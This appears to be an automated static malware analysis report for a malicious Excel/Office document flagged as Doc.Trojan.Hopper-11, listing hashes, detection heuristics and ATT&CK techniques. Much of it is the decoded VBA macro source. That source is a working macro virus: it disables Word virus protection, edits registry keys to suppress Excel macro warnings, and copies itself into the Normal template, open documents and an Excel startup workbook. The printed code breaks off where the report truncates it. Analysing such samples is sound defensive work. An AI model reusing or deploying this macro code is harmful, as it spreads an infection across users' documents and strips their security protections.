Doc.Trojan.Hopper-11 — Office (OLE) malware analysis

Static analysis result for SHA-256 5c1ce3da84dd952c…

MALICIOUS

Office (OLE)

Size: 56.5 KB
Created: 2000-08-08 05:48:02
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: e5a59dc94dcaf2fc121fcbe699bc8219
SHA-1: 0d97eb4ceb0c2023b55001498598dfdcf5bb4e8e
SHA-256: 5c1ce3da84dd952cac253ba4c3a33db5f4aa546e000fc0b594c3faf0b7ac9ede
Risk Score: 300

Malware Insights

Doc.Trojan.Hopper-11 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1546.001 Event Triggered Execution: Event Triggered Execution

The sample contains VBA macros, including an AutoOpen subroutine, a common technique in malicious Office documents. The script attempts to disable virus protection for Word and Excel and modifies registry keys to disable macro security warnings. It also includes functionality to save the current file and infect other Office documents, indicating worm-like behavior.

Heuristics 6

  • ClamAV: Doc.Trojan.Hopper-11 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-11
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5682 bytes
SHA-256: 09756858c775bde368bd8d91fea97746c3e17fcd32c3b752e34074fa35d948b6
Detection
ClamAV: Doc.Trojan.Hopper-11
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--BEAT,V1.0-->
'2000-4
Private Sub autoexec()
    SaveAsMyFile "A:", Application.Path
    InfectWordAndExcel
End Sub
Private Sub autoopen()
    SaveAsMyFile "A:", Application.Path
    InfectWordAndExcel
End Sub
Private Sub Document_Close()
    SaveAsMyFile "A:", Application.Path
    InfectWordAndExcel
End Sub
Private Sub Workbook_Deactivate()
    InfectWordAndExcel
End Sub

Private Sub InfectWordAndExcel()
    On Error Resume Next
    Set WordObj = GetObject(, "Word.Application")
     If WordObj = "" Then
    Set WordObj = CreateObject("Word.Application")
        WQuit = True
    End If
    Set xlApp = GetObject(, "Excel.Application")
     If xlApp = "" Then
    Set xlApp = CreateObject("Excel.Application")
        EQuit = True
    End If
''===============================================
'''word'VirusProtection
     Set WdappOp = WordObj.Options
    With WdappOp
        .VirusProtection = False
        .ConfirmConversions = False
        .SaveNormalPrompt = False
    End With    ''
    '''excel'VirusProtection
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Check"
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = "0" '= ""
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Whoa"
''==========================
    Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule
    Set ad = WordObj.ActiveDocument.VBProject.VBComponents(1).CodeModule
''  DoWordtoItself
If Application.Name = "Microsoft Word" Then
     If ad.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
        ad.DeleteLines 1, ad.CountOfLines
        ad.InsertLines 1, TT.Lines(1, TT.CountOfLines)
        If ad.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
            ad.InsertLines 1, nt.Lines(1, nt.CountOfLines)
        End If
    End If
     If nt.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
        nt.DeleteLines 1, nt.CountOfLines
        nt.InsertLines 1, ad.Lines(1, ad.CountOfLines)
     End If
        '-------------------
     If TT.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
        TT.DeleteLines 1, TT.CountOfLines
        TT.InsertLines 1, nt.Lines(1, nt.CountOfLines)
    End If
    ActiveDocument.Save
''    DoWordtoExcel
    '-----------
    If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) = UCase("BOOK1") Then ''convert to an uppercase string
            Kill xlApp.Application.StartupPath + "\Book1."
    End If
    '------------
    Set Book1Obj = xlApp.Workbooks.Add
        Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountOfLines)
        Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
        Book1Obj.Close
 End If ''====Word
 ''===================================================
'''Workbook_Deactivate
If Application.Name = "Microsoft Excel 8.0 中文版" Then
    Set AW = xlApp.ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW = xlApp.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        If AW.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
        AW.DeleteLines 1, AW.CountOfLines
        AW.InsertLines 1, TW.Lines(1, TW.CountOfLines)
    End If
        If TW.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
        TW.DeleteLines 1, TW.CountOfLines
        TW.InsertLines 1, AW.Lines(1, TW.CountOfLines)
    End If
    '--------------
     If nt.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then
        nt.DeleteLines 1, nt.CountOfLines
        nt.InsertLines 1, TW.Lines(1, TW.CountOfLines)
     End If
     ActiveWorkbook.Save
  E
... (truncated)